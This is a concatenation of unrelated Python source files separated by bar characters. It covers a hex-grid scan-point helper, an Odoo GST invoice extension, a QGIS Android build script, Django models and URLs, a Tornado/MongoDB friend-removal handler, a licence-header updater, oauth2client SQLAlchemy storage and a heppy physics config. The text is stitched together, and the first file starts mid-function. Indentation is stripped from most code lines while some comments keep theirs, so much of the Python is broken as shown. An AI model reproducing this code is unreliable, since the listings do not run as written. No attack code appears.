if ind_lat + 1 == len(self.grid):
ind_t = ind_lat
poss.append([90.0, 0.0])
else:
ind_t = ind_lat + 1
for ind_tlat in range(ind_f, ind_t):
d_lng = 360.0 / self.grid[ind_tlat][1]
lng = floor(l_lng / d_lng) * d_lng
if not self.grid[ind_tlat][2]:
lng += 0.5 * d_lng
poss.append([self.grid[ind_tlat][0], lng])
poss.append([self.grid[ind_tlat][0], lng + d_lng])
dist_min = 3.0
ind_min = 0
for p in range(0, len(poss)):
dist = self.dist_cmp(location, poss[p])
if dist < dist_min:
dist_min = dist
ind_min = p
if neg_lat:
poss[ind_min][0] = -poss[ind_min][0]
poss[ind_min][1] = (poss[ind_min][1] + 180) % 360 - 180
return poss[ind_min]
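# Minimal usage sketch (assumed coordinates): build the global hex grid and
# cover a 200 m circle around a point; each returned [lat, lng] is a scan
# position whose 70 m sight radius helps tile the requested area.
if __name__ == '__main__':
    grid = Hexgrid()
    centre = (52.52, 13.405)
    points = grid.cover_circle(centre, 200.0)
    print('%d scan points within 200 m of %s' % (len(points), centre))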
|
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
class AccountInvoice(models.Model):
_inherit = "account.invoice"
@api.depends('amount_total')
def _compute_amount_total_words(self):
for invoice in self:
invoice.amount_total_words = invoice.currency_id.amount_to_text(invoice.amount_total)
amount_total_words = fields.Char("Total (In Words)", compute="_compute_amount_total_words")
    # Used for invisible fields in form views.
l10n_in_import_export = fields.Boolean(related='journal_id.l10n_in_import_export', readonly=True)
    # For export invoices this data is needed in the GSTR report
l10n_in_export_type = fields.Selection([
('regular', 'Regular'), ('deemed', 'Deemed'),
('sale_from_bonded_wh', 'Sale from Bonded WH'),
('export_with_igst', 'Export with IGST'),
('sez_with_igst', 'SEZ with IGST payment'),
('sez_without_igst', 'SEZ without IGST payment')],
string='Export Type', default='regular', required=True)
l10n_in_shipping_bill_number = fields.Char('Shipping bill number', readonly=True, states={'draft': [('readonly', False)]})
l10n_in_shipping_bill_date = fields.Date('Shipping bill date', readonly=True, states={'draft': [('readonly', False)]})
l10n_in_shipping_port_code_id = fields.Many2one('l10n_in.port.code', 'Shipping port code', states={'draft': [('readonly', False)]})
l10n_in_reseller_partner_id = fields.Many2one('res.partner', 'Reseller', domain=[('vat', '!=', False)], help="Only Registered Reseller", readonly=True, states={'draft': [('readonly', False)]})
l10n_in_partner_vat = fields.Char(related="partner_id.vat", readonly=True)
def _get_report_base_filename(self):
self.ensure_one()
if self.company_id.country_id.code != 'IN':
return super(AccountInvoice, self)._get_report_base_filename()
        if self.type == 'out_invoice' and self.state == 'draft':
            return _('Draft %s') % (self.journal_id.name)
        if self.type == 'out_invoice' and self.state in ('open', 'in_payment', 'paid'):
            return '%s - %s' % (self.journal_id.name, self.number)
        if self.type == 'out_refund' and self.state == 'draft':
            return _('Credit Note')
        if self.type == 'out_refund':
            return _('Credit Note - %s') % (self.number)
        if self.type == 'in_invoice' and self.state == 'draft':
            return _('Vendor Bill')
        if self.type == 'in_invoice' and self.state in ('open', 'in_payment', 'paid'):
            return _('Vendor Bill - %s') % (self.number)
        if self.type == 'in_refund' and self.state == 'draft':
            return _('Vendor Credit Note')
        if self.type == 'in_refund':
            return _('Vendor Credit Note - %s') % (self.number)
@api.multi
def _invoice_line_tax_values(self):
self.ensure_one()
tax_datas = {}
TAX = self.env['account.tax']
for line in self.mapped('invoice_line_ids'):
price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)
tax_lines = line.invoice_line_tax_ids.compute_all(price_unit, line.invoice_id.currency_id, line.quantity, line.product_id, line.invoice_id.partner_id)['taxes']
for tax_line in tax_lines:
tax_line['tag_ids'] = TAX.browse(tax_line['id']).tag_ids.ids
tax_datas[line.id] = tax_lines
return tax_datas
def inv_line_characteristic_hashcode(self, invoice_line):
res = super(AccountInvoice, self).inv_line_characteristic_hashcode(invoice_line)
return res + "-%s" %(invoice_line.get('product_uom_id', 'False'))
@api.model
def tax_line_move_line_get(self):
res = super(AccountInvoice, self).tax_line_move_line_get()
for vals in res:
invoice_tax_line = self.env['account.invoice.tax'].browse(vals.get('invoice_tax_line_id'))
vals['product_id'] = invoice_tax_line.l10n_in_product_id.id
vals['uom_id'] = invoice_tax_line.l10n_in_uom_id.id
vals['quantity'] = invoice_tax_line.l10n_in_quantity
return res
def _prepare_tax_line_vals(self, line, tax):
vals = super(AccountInvoice, self)._prepare_tax_line_vals(line, tax)
vals['l10n_in_product_id'] = line.product_id.id
vals['l10n_in_uom_id'] = line.uom_id.id
vals['l10n_in_quantity'] = line.quantity
return vals
@api.multi
def get_taxes_values(self, tax_group_fields=False):
if tax_group_fields:
tax_group_fields |= set(['l10n_in_quantity'])
else:
tax_group_fields = set(['l10n_in_quantity'])
return super(AccountInvoice, self).get_taxes_values(tax_group_fields)
class AccountInvoiceTax(models.Model):
_inherit = "account.invoice.tax"
l10n_in_product_id = fields.Many2one('product.product', string='Product')
l10n_in_uom_id = fields.Many2one('uom.uom', string='Unit of Measure')
l10n_in_quantity = fields.Float(string='Quantity')
@api.multi
def _prepare_invoice_tax_val(self):
res = super(AccountInvoiceTax, self)._prepare_invoice_tax_val()
res['l10n_in_product_id'] = self.l10n_in_product_id.id
res['l10n_in_uom_id'] = self.l10n_in_uom_id.id
return res
|
from qgis_mobility.generator.builder import Builder
import distutils.dir_util
import os
import glob
import shutil
from qgis_mobility.generator.python_builder import PythonBuilder
from qgis_mobility.generator.qgis_builder import QGisBuilder
from qgis_mobility.generator.pyqt_builder import PyQtBuilder
class RuntimeBuilder(Builder):
""" Represents the build strategy for the Runtime library """
def library_name(self):
""" Returns the library name of the runtime """
return 'runtime'
def human_name(self):
""" Returns the human readable name of the Runtime """
return 'Runtime Build Process'
def pyqt4_override_flags(self):
return "-x QSETINT_CONVERSION -x QSETTYPE_CONVERSION -x VendorID -t WS_UNKOWN -x PyQt_NoPrintRangeBug -t Qt_4_8_0 -x Py_v3 -g"
def sip_dir(self):
return os.path.join(self.cache_path,
'build', 'Python-2.7.2', 'share', 'sip')
def host_python_binary_path(self):
return os.path.join(self.cache_path, 'hostpython', 'bin')
def get_default_toolchain_mappings(self):
flags = Builder.get_default_toolchain_mappings(self)
flags['LD_RUN_PATH'] = os.path.join(self.get_recon().get_qt_path(), 'lib')
return flags
def get_default_flags(self):
cflags = '-Wno-psabi -fsigned-char -mthumb'
ldflags = '-Wl,--fix-cortex-a8'
return { 'CFLAGS' : cflags,
'LDFLAGS' : ldflags,
'CXXFLAGS' : cflags }
def get_default_configure_flags(self):
flags = Builder.get_default_configure_flags(self)
flags.extend(['--with-qgis-base-path=' + QGisBuilder(self.get_recon()).get_build_path(),
'--with-python-base-path=' + PythonBuilder(self.get_recon()).get_build_path(),
'--with-qt-base-path=' + self.get_recon().get_qt_path(),
'--with-qt-library-path=' + os.path.join(self.get_source_path(), 'lib'),
'--with-qt-include-path=' + os.path.join(self.get_recon().get_qt_path(), 'include'),
'--with-sip=' + self.sip_dir(),
'--with-pyqt4-flags=' + self.pyqt4_override_flags(),
'--with-pyqt4-dir=' + self.sip_dir(),
'--with-sip-binary-path=' + self.host_python_binary_path(),
'--with-preconfig-path=/data/data/org.kde.necessitas.example.QGisMobility/files',
'--with-project-code-path=/data/data/org.kde.necessitas.example.QGisMobility/files/application',
'--with-xtra-sip-dirs=' + os.path.join(QGisBuilder(self.get_recon()).get_source_path(),
'qgis-1.8.0/python'),
'--disable-silent-rules'])
return flags
def salt_flags(self, flags):
flags = Builder.salt_flags(self, flags)
pkg_config_path = os.path.join(self.get_build_path(), 'lib', 'pkg_config')
        if 'PKG_CONFIG_PATH' in flags:
            # Extend an existing search path; entries are separated by
            # os.pathsep (':' on POSIX), not the directory separator.
            flags['PKG_CONFIG_PATH'] += os.pathsep + pkg_config_path
        else:
            flags['PKG_CONFIG_PATH'] = pkg_config_path
return flags
def do_build(self):
""" Runs the actual build process """
distutils.dir_util.copy_tree(self.get_runtime_path(), self.get_source_path())
os.mkdir(os.path.join(self.get_source_path(), 'lib'))
for libname in glob.glob(os.path.join(self.get_recon().get_qt_path(), 'lib', '*.so')):
outlibname = os.path.join(self.get_source_path(), 'lib', os.path.split(libname)[-1])
print "Copying for libtool's sake %s to %s" % (libname, outlibname)
shutil.copyfile(libname, outlibname)
self.run_autoreconf()
self.sed_ir('s/(hardcode_into_libs)=.*$/\\1=no/', 'configure')
self.fix_config_sub_and_guess()
# Need to remove Q_PID declaration in the source files temporarily
qprocess_sip_path = os.path.join(
PyQtBuilder(self.get_recon()).get_build_path(),
'share', 'sip', 'QtCore', 'qprocess.sip')
try:
self.sed_ir('s|typedef qint64 Q_PID;|//typedef qint64 Q_PID;|',
qprocess_sip_path)
self.run_autotools_and_make()
finally:
self.sed_ir('s|//typedef qint64 Q_PID;|typedef qint64 Q_PID;|',
qprocess_sip_path)
source_include_path = os.path.join(self.get_build_path(), 'include')
if os.path.exists(source_include_path):
distutils.dir_util.copy_tree(
source_include_path, self.get_include_path())
self.mark_finished()
|
from common import mathutil
import decimal
def main():
decimal.getcontext().prec = 110
total = 0
for i in range(1, 100):
if not mathutil.isPower(i, 2):
total += sumOfDigits(i)
print(total)
def sumOfDigits(n):
dec = str(decimal.Decimal(n).sqrt())
i = dec.index('.')
    dec = dec[i + 1:i + 100]  # 99 decimal digits; the integer digit makes 100
return sum(int(i) for i in dec) + int(n ** .5)
if __name__ == "__main__":
main()
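# Illustrative check (added, not part of the original solution): for n < 100
# the integer part of sqrt(n) is a single digit, so the 99 sliced decimal
# digits plus int(n ** .5) give exactly the first 100 digits of the root.
assert all(len(str(int(n ** 0.5))) == 1 for n in range(1, 100))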
|
from __future__ import absolute_import
import os
tests_dir = os.path.dirname(os.path.realpath(__file__)) or '.'
os.chdir(tests_dir)
_okconfig_overridden_vars = {}
_environment = None
import okconfig
import okconfig.config as config
from shutil import copytree
import unittest2 as unittest
from pynag.Utils.misc import FakeNagiosEnvironment
class OKConfigTest(unittest.TestCase):
def setUp(self, test=None):
"""
Sets up the nagios fake environment and overrides okconfig configuration
variables to make changes within it.
"""
global _environment
_environment = FakeNagiosEnvironment()
_environment.create_minimal_environment()
copytree(os.path.realpath("../usr/share/okconfig/templates"),
_environment.tempdir + "/conf.d/okconfig-templates")
_environment.update_model()
for var in ['nagios_config', 'destination_directory',
'examples_directory', 'examples_directory_local',
'template_directory']:
_okconfig_overridden_vars[var] = getattr(okconfig, var)
okconfig.nagios_config = _environment.get_config().cfg_file
config.nagios_config = okconfig.nagios_config
config.git_commit_changes = 0
okconfig.destination_directory = _environment.objects_dir
okconfig.examples_directory = "../usr/share/okconfig/examples"
okconfig.template_directory = "../usr/share/okconfig/templates"
okconfig.examples_directory_local = _environment.tempdir + "/okconfig"
os.mkdir(okconfig.examples_directory_local)
okconfig.addhost("linux.okconfig.org",
address="192.168.1.1",
templates=["linux"])
okconfig.addhost("windows.okconfig.org",
address="192.168.1.2",
templates=["windows"])
okconfig.addhost("webserver.okconfig.org",
address="192.168.1.2",
templates=["http"])
def tearDown(self, test=None):
"""
Tear down the fake nagios environment and restore okconfig variables
"""
_environment.terminate()
for var, value in list(_okconfig_overridden_vars.items()):
setattr(okconfig, var, value)
def runTest(*args, **kwargs):
pass
|
from __future__ import print_function, division, unicode_literals
import os
import ycm_core
from clang_helpers import PrepareClangFlags
compilation_database_folder = ''
flags = [
'-std=c++11',
'-x',
'c++',
'-DQT_CORE_LIB',
'-DQT_GUI_LIB',
'-DQT_NETWORK_LIB',
'-DQT_QML_LIB',
'-DQT_QUICK_LIB',
'-DQT_SQL_LIB',
'-DQT_WIDGETS_LIB',
'-DQT_XML_LIB',
'-I', '/usr/lib/qt/mkspecs/linux-clang',
'-I', '/usr/include/qt4',
'-I', '/usr/include/qt4/QtCore',
'-I', '/usr/include/qt4/QtGui',
'-I', '/usr/include/qt4/QtNetwork',
'-I', '/usr/include/qt4/QtWidgets',
'-I', '/usr/include/qjson',
'-I', '/usr/include/X11',
'-I', '/usr/include/X11/extensions',
'-I', '.',
'-I', 'Tests',
'-I', 'build',
'-I', 'build/Tests'
]
if compilation_database_folder:
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return flags
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
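# For example (hand-checked illustration, not from the original file): with
# working_directory '/proj', the pair [ '-I', 'include' ] becomes
# [ '-I', '/proj/include' ], and the fused form '-Iinclude' becomes
# '-I/proj/include'.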
def FlagsForFile( filename ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = database.GetCompilationInfoForFile( filename )
final_flags = PrepareClangFlags(
MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ ),
filename )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
from django.conf.urls import patterns, url
from .views import ChatRoom, CreateMessage, CreateRoom
from django.contrib.auth.decorators import login_required
urlpatterns = patterns('',
url(r'^$', login_required(CreateRoom.as_view()), name='lobby'),
url(r'^(?P<room>.+)/msg/$', login_required(CreateMessage.as_view()), name='create_message'),
url(r'^(?P<room>.+)/$', login_required(ChatRoom.as_view()), name='chatroom'),
)
|
import os
def show_info():
    # List 1-Wire slave devices; family code 28 identifies DS18B20
    # temperature sensors.
    temp_sensor_list = ""
    for folder in sorted(os.listdir("/sys/bus/w1/devices")):
        if folder.startswith("28-"):
            temp_sensor_list += folder + "\n"
    return temp_sensor_list.strip()
if __name__ == '__main__':
print(show_info())
|
from django.test import TestCase
from django.test.client import Client
class DownloadTest(TestCase):
def setUp(self):
self.client = Client()
def test_access_download_page(self):
"""
Test the access to the download page. Allow for everybody.
"""
result = self.client.get('/download/')
self.assertEqual(result.status_code, 200)
|
import sys, os
import qtawesome as qta
from components import create
from components import introductionWindow
from PyQt5 import QtGui, QtCore, QtWidgets
import colorama as clr
class Window(QtWidgets.QWidget):
def __init__(self):
super(Window, self).__init__()
self.setGeometry(50,50,1200,700)
self.setWindowTitle("Hitch")
self.setWindowFlags(self.windowFlags() | QtCore.Qt.FramelessWindowHint) #Use this for a frameless window. Will be used later!
create.CreateUI.create(self)
#init colorama
clr.init()
#Set the app icon, maximize the window, show it and the startup window.
self.icon()
self.center()
self.showMaximized()
self.show()
self.startup = introductionWindow.Introduction()
self.startup.show()
#Center the window on the monitor where the mouse cursor is
def center(self):
frameGm = self.frameGeometry()
screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
#Minimize and maximize methods for the new window action buttons
def minimize(self):
self.showMinimized()
def maximize(self):
if self.isMaximized():
self.showNormal()
else:
self.showMaximized()
def icon(self):
#Set app icon
app_icon = QtGui.QIcon()
app_icon.addFile('resources/icons/16x16.png', QtCore.QSize(16,16))
app_icon.addFile('resources/icons/32x32.png', QtCore.QSize(32,32))
app_icon.addFile('resources/icons/64x64.png', QtCore.QSize(64,64))
app_icon.addFile('resources/icons/128x128.png', QtCore.QSize(128,128))
app_icon.addFile('resources/icons/256x256.png', QtCore.QSize(256,256))
        # Use the QApplication instance rather than the module-level "app"
        # global so this method also works when the module is imported.
        QtWidgets.QApplication.instance().setWindowIcon(app_icon)
if __name__ == '__main__':
#Creating the QApplication
app = QtWidgets.QApplication(sys.argv)
#Set the main styling of the app
    #Yes, it's all in this file!
with open("./appearance/style/stylesheet.css") as f:
theme = f.read()
app.setStyleSheet(theme)
#Misc stuff
window = Window()
sys.exit(app.exec_())
|
from tornado import web,ioloop
import os
from pymongo import MongoClient
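# Assumed document shape, inferred from the queries below (not stated in the
# original source): user documents look like
#   { "_id": 42, "friend": [[7, 1], [13, 1], ...] }
# where each friend entry pairs the friend's id with a status flag.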
class removeHandler(web.RequestHandler):
def get(self):
# GET THE URL DATA
userid = self.get_query_arguments("userid")[0]
friendid = self.get_query_arguments("friendid")[0]
#MAKE DATABASE CONNECTION
client = MongoClient()
db_livechat = client.livechat
usercol = db_livechat.user
#Query The DATA
frienddata1 = usercol.find_one({"_id":int(userid) },{"friend":1,"_id":0})
frienddata2 = usercol.find_one({"_id":int(friendid) },{"friend":1,"_id":0})
for i in frienddata1['friend']:
getid = int(i[0])
if getid == int(friendid):
r0 = usercol.update({"_id": int(userid)},{"$pull":{"friend":[getid,1]}})
for j in frienddata2['friend']:
usr = int(j[0])
if usr == int(userid):
ret0 = usercol.update({"_id": int(friendid)},{"$pull":{"friend":[usr,1]}})
frienddata = usercol.find_one({"_id":int(userid) },{"friend":1,"_id":0})
#Send the final result
self.write(frienddata)
|
import os
import sys
import re
excludePaths = ['\\.git',
'/gtest',
'/gmock',
'/qhttpserver',
'/qt5rpi']
def update_source(filename, oldcopyright, copyright):
    # In text mode Python 3 decodes a UTF-8 BOM to U+FEFF, so detect that
    # instead of the raw 0xEF 0xBB 0xBF byte sequence.
    bom = '\ufeff'
    with open(filename, 'r', encoding='utf-8') as f:
        fdata = f.read()
    isUTF = fdata.startswith(bom)
    if isUTF:
        fdata = fdata[len(bom):]
    if oldcopyright is not None and fdata.startswith(oldcopyright):
        fdata = fdata[len(oldcopyright):]
    # Compare ignoring surrounding whitespace
    strippedFData = fdata.strip()
    strippedCopyright = copyright.strip()
    if not strippedFData.startswith(strippedCopyright):
        print(" Updating %s" % filename)
        fdata = copyright + fdata
        with open(filename, 'w', encoding='utf-8') as f:
            if isUTF:
                f.write(bom + fdata)
            else:
                f.write(fdata)
    else:
        print(" File %s already up to date" % filename)
def recursive_traversal(dir, oldcopyright, licenseTemplates):
global excludePaths
fns = os.listdir(dir)
print("Processing directory %s ..." % dir)
for fn in fns:
fullfn = os.path.join(dir,fn)
skipFile = False
for rx in excludePaths:
if re.search(rx, fullfn):
print("Excluding %s" % fullfn)
skipFile = True
break
if skipFile:
continue
if (fullfn in excludePaths):
continue
if (os.path.isdir(fullfn)):
recursive_traversal(fullfn, oldcopyright, licenseTemplates)
else:
ext = os.path.splitext(fullfn)[1]
            if ext in licenseTemplates:
licenseTemplate = licenseTemplates[ext]
print(" Processing %s ..." % fullfn)
update_source(fullfn, oldcopyright, licenseTemplate)
else:
print(" Skipping %s as there is no template associated" % fullfn)
templateCpp = open("license_template_cpp.txt", 'r').read()
templateQml = open("license_template_qml.txt", 'r').read()
templatePro = open("license_template_pro.txt", 'r').read()
templateSh = open("license_template_sh.txt", 'r').read()
licenseTemplates = {'.cpp': templateCpp,
'.h': templateCpp,
'.qml': templateQml,
'.js': templateQml,
'.pro': templatePro,
'.pri': templatePro,
'.sh': templateSh}
if len(sys.argv) == 1:
print("ERROR: No path provided")
sys.exit(1)
print("Checking path %s ..." % sys.argv[1])
recursive_traversal(sys.argv[1], None, licenseTemplates)
print("[DONE]")
exit()
|
"""OAuth 2.0 utilities for SQLAlchemy.
Utilities for using OAuth 2.0 in conjunction with SQLAlchemy.
Configuration
=============
In order to use this storage, you'll need to create a table
with :class:`oauth2client.contrib.sql_alchemy.CredentialsType` column.
It's recommended to either put this column on some sort of user info
table or put the column in a table with a belongs-to relationship to
a user info table.
Here's an example of a simple table with a :class:`CredentialsType`
column that's related to a user table by the `user_id` key.
.. code-block:: python
from oauth2client.contrib.sql_alchemy import CredentialsType
from sqlalchemy import Column, ForeignKey, Integer
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
Base = declarative_base()
class Credentials(Base):
__tablename__ = 'credentials'
user_id = Column(Integer, ForeignKey('user.id'))
credentials = Column(CredentialsType)
    class User(Base):
        __tablename__ = 'user'
        id = Column(Integer, primary_key=True)
# bunch of other columns
credentials = relationship('Credentials')
Usage
=====
With the tables ready, you can now store credentials in the database.
We will reuse tables defined above.
.. code-block:: python
from oauth2client.client import OAuth2Credentials
from oauth2client.contrib.sql_alchemy import Storage
from sqlalchemy.orm import Session
session = Session()
user = session.query(User).first()
storage = Storage(
session=session,
model_class=Credentials,
# This is the key column used to identify
# the row that stores the credentials.
key_name='user_id',
key_value=user.id,
property_name='credentials',
)
# Store
credentials = OAuth2Credentials(...)
storage.put(credentials)
# Retrieve
credentials = storage.get()
# Delete
storage.delete()
"""
from __future__ import absolute_import
import sqlalchemy.types
import oauth2client.client
class CredentialsType(sqlalchemy.types.PickleType):
"""Type representing credentials.
Alias for :class:`sqlalchemy.types.PickleType`.
"""
class Storage(oauth2client.client.Storage):
"""Store and retrieve a single credential to and from SQLAlchemy.
This helper presumes the Credentials
have been stored as a Credentials column
on a db model class.
"""
def __init__(self, session, model_class, key_name,
key_value, property_name):
"""Constructor for Storage.
Args:
session: An instance of :class:`sqlalchemy.orm.Session`.
model_class: SQLAlchemy declarative mapping.
key_name: string, key name for the entity that has the credentials
key_value: key value for the entity that has the credentials
property_name: A string indicating which property on the
``model_class`` to store the credentials.
This property must be a
:class:`CredentialsType` column.
"""
super(Storage, self).__init__()
self.session = session
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve stored credential.
Returns:
A :class:`oauth2client.Credentials` instance or `None`.
"""
filters = {self.key_name: self.key_value}
query = self.session.query(self.model_class).filter_by(**filters)
entity = query.first()
if entity:
credential = getattr(entity, self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
else:
return None
def locked_put(self, credentials):
"""Write a credentials to the SQLAlchemy datastore.
Args:
credentials: :class:`oauth2client.Credentials`
"""
filters = {self.key_name: self.key_value}
query = self.session.query(self.model_class).filter_by(**filters)
entity = query.first()
if not entity:
entity = self.model_class(**filters)
setattr(entity, self.property_name, credentials)
self.session.add(entity)
def locked_delete(self):
"""Delete credentials from the SQLAlchemy datastore."""
filters = {self.key_name: self.key_value}
self.session.query(self.model_class).filter_by(**filters).delete()
|
import os
import unittest
from vsg.rules import if_statement
from vsg import vhdlFile
from vsg.tests import utils
sTestDir = os.path.dirname(__file__)
lFile, eError = vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir, 'rule_011_test_input.vhd'))
lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_011_test_input.fixed.vhd'), lExpected)
class test_if_statement_rule(unittest.TestCase):
def setUp(self):
self.oFile = vhdlFile.vhdlFile(lFile)
self.assertIsNone(eError)
def test_rule_011(self):
oRule = if_statement.rule_011()
self.assertTrue(oRule)
self.assertEqual(oRule.name, 'if')
self.assertEqual(oRule.identifier, '011')
lExpected = [29, 35]
oRule.analyze(self.oFile)
self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))
def test_fix_rule_011(self):
oRule = if_statement.rule_011()
oRule.fix(self.oFile)
lActual = self.oFile.get_lines()
self.assertEqual(lExpected, lActual)
oRule.analyze(self.oFile)
self.assertEqual(oRule.violations, [])
|
from django.db import models
from apps.core.querysets import BaseModelQuerySet
from django.utils.translation import ugettext as _
from django.contrib.auth.base_user import BaseUserManager
from cities_light.abstract_models import (
AbstractRegion, AbstractCountry, AbstractCity
)
from cities_light.receivers import connect_default_signals
class EmailUserManager(BaseUserManager):
    def create_user(self, *args, **kwargs):
        """
        Create and save a user with the data passed via kwargs.
        """
        email = self.normalize_email(kwargs["email"])
        if not email:
            raise ValueError(_('Users must have an email address'))
        kwargs["email"] = email  # keep the normalized address
        password = kwargs.pop("password")
        user = self.model(**kwargs)
        user.set_password(password)
        user.save(using=self._db)
        return user
def create_superuser(self, *args, **kwargs):
"""
        Create and save a superuser with the data passed via kwargs.
"""
user = self.create_user(**kwargs)
user.is_admin = True
user.save(using=self._db)
return user
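# Usage sketch (hypothetical model names, added for illustration; assumes a
# custom user model whose "objects" manager is an EmailUserManager):
#   user = User.objects.create_user(email='ana@example.com', password='s3cret')
#   admin = User.objects.create_superuser(email='root@example.com', password='s3cret')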
class BaseModel(models.Model):
""" Model base do sistema """
is_active = models.BooleanField(_('Ativo'), default=True)
created_at = models.DateTimeField(_('Criado em'), auto_now_add=True)
updated_at = models.DateTimeField(_('Modificado em'), auto_now=True)
media_path = ''
objects = BaseModelQuerySet.as_manager()
class Meta:
abstract = True
ordering = ('-updated_at',)
class Country(AbstractCountry):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("País")
verbose_name_plural = _("Países")
ordering = ['alternate_names']
connect_default_signals(Country)
class Region(AbstractRegion):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("Estado")
verbose_name_plural = _("Estados")
ordering = ['alternate_names']
connect_default_signals(Region)
class City(AbstractCity):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("Cidade")
verbose_name_plural = _("Cidades")
ordering = ['alternate_names']
connect_default_signals(City)
class Location(models.Model):
country = models.ForeignKey(
verbose_name=_("País"),
null=True,
to=Country,
)
region = models.ForeignKey(
verbose_name=_("Estado"),
null=True,
to=Region,
)
city = models.ForeignKey(
verbose_name=_("Cidade"),
null=True,
to=City,
)
class Meta:
abstract = True
class Schooling(models.Model):
level = models.CharField(
max_length=150, verbose_name='Nivel', db_index=True
)
def __str__(self):
return self.level
class Profession(models.Model):
name = models.CharField(
max_length=150, verbose_name='Nome', db_index=True
)
def __str__(self):
return self.name
|
import os
import copy
import heppy.framework.config as cfg
gen_jobs = 0
do_display = True
do_pf = False
nevents_per_job = 5000
GEN = gen_jobs
FCC = os.environ.get('FCCEDM', False) and not GEN
CMS = os.environ.get('CMSSW_BASE', False) and not GEN
if gen_jobs>1:
do_display = False
selectedComponents = None
if CMS:
# from heppy_fcc.samples.gun_0_50 import *
from heppy_fcc.samples.higgs_350 import hz_cms
selectedComponents = [hz_cms]
# selectedComponents = [gun_211_0_50]
for comp in selectedComponents:
comp.splitFactor = 1
else:
inputSample = cfg.Component(
'albers_example',
files = ['example.root']
)
selectedComponents = [inputSample]
source = None
if GEN:
selectedComponents = []
for i in range(gen_jobs):
component = cfg.Component(''.join(['sample_Chunk',str(i)]), files=['dummy.root'])
selectedComponents.append(component)
from heppy_fcc.analyzers.Gun import Gun
source = cfg.Analyzer(
Gun,
pdgid = 130,
ptmin = 0.,
ptmax = 10.
)
elif FCC:
from heppy_fcc.analyzers.FCCReader import FCCReader
source = cfg.Analyzer(
FCCReader
)
elif CMS:
from heppy_fcc.analyzers.CMSReader import CMSReader
source = cfg.Analyzer(
CMSReader,
gen_particles = 'genParticles',
pf_particles = 'particleFlow' if do_pf else None
)
else:
    raise ValueError('not a generator job, and experiment unrecognized. Set the CMS or FCC environment')
from heppy_fcc.analyzers.PFSim import PFSim
pfsim = cfg.Analyzer(
PFSim,
display = do_display,
verbose = False
)
from heppy_fcc.analyzers.JetClusterizer import JetClusterizer
genjets = cfg.Analyzer(
JetClusterizer,
instance_label = 'gen',
particles = 'gen_particles_stable'
)
jets = cfg.Analyzer(
JetClusterizer,
instance_label = 'rec',
particles = 'particles'
)
from heppy_fcc.analyzers.JetAnalyzer import JetAnalyzer
jetana = cfg.Analyzer(
JetAnalyzer,
instance_label = 'rec',
jets = 'rec_jets',
genjets = 'gen_jets'
)
from heppy_fcc.analyzers.JetTreeProducer import JetTreeProducer
tree = cfg.Analyzer(
JetTreeProducer,
instance_label = 'rec',
tree_name = 'events',
tree_title = 'jets',
jets = 'rec_jets'
)
jetsequence = [
jets,
jetana,
tree
]
if CMS and do_pf:
pfjetsequence = copy.deepcopy(jetsequence)
for ana in pfjetsequence:
ana.instance_label = 'pf'
if hasattr(ana, 'jets'):
ana.jets = 'pf_jets'
if hasattr(ana, 'particles'):
ana.particles = 'pf_particles'
sequence = cfg.Sequence( [
source,
pfsim,
genjets,
] )
sequence.extend(jetsequence)
if CMS and do_pf:
sequence.extend(pfjetsequence)
if FCC:
from heppy_fcc.analyzers.GenAnalyzer import GenAnalyzer
genana = cfg.Analyzer(
GenAnalyzer
)
# sequence.append(genana)
Events = None
if gen_jobs:
from heppy.framework.eventsgen import Events
elif os.environ.get('FCCEDM'):
from ROOT import gSystem
gSystem.Load("libdatamodel")
from eventstore import EventStore as Events
elif os.environ.get('CMSSW_BASE'):
from PhysicsTools.HeppyCore.framework.eventsfwlite import Events
config = cfg.Config(
components = selectedComponents,
sequence = sequence,
services = [],
events_class = Events
)
if __name__ == '__main__':
import sys
from heppy.framework.looper import Looper
import logging
# next 2 lines necessary to deal with reimports from ipython
logging.shutdown()
reload(logging)
logging.basicConfig(level=logging.ERROR)
import random
# for reproducible results
random.seed(0xdeadbeef)
def process(iev=None):
if iev is None:
iev = loop.iEvent
loop.process(iev)
if display:
display.draw()
def next():
loop.process(loop.iEvent+1)
if display:
display.draw()
iev = None
if len(sys.argv)==2:
iev = int(sys.argv[1])
loop = Looper( 'looper', config,
nEvents=nevents_per_job,
nPrint=5,
timeReport=True)
pfsim = loop.analyzers[1]
